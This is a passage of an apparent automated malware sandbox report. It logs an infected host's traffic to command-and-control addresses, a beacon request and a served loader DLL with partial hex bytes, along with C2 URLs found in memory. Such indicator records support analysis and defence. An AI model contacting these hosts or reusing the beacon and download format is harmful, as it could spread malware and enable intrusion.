      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
      Source: global trafficTCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
      Source: global trafficTCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80

      Networking

      barindex
      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80
      Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
      Source: Malware configuration extractorURLs: alexbionka.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03Host: alexbionka.com
      Source: Joe Sandbox ViewIP Address: 64.227.108.27 64.227.108.27
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Aug 2022 15:27:53 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34X-Powered-By: PHP/7.2.34Content-Description: File TransferContent-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n152.dll"Expires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 360448Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 12 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 07 00 0c 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: GET /fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 15:28:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: rundll32.exe, 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146
      Source: r8F8A.tmp.exe, 00000004.00000002.947212998.0000000000544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO651
      Source: rundll32.exe, 00000005.00000002.946500904.0000000000134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
      Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm&
      Source: rundll32.exe, 00000005.00000002.946524016.0000000000420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm516F-U91Z1DJNJ2U9D-823/rm3/rm3/rm
      Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmT&
      Source: r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rma
      Source: r8F8A.tmp.exe, 00000004.00000002.947197812.0000000000360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmj
      Source: r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmli
      Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmv&
      Source: rundll32.exe, 00000005.00000002.946611241.0000000000504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com/
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4221A912-2B82-4834-A4D3-95CF1F77F776}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: alexbionka.com
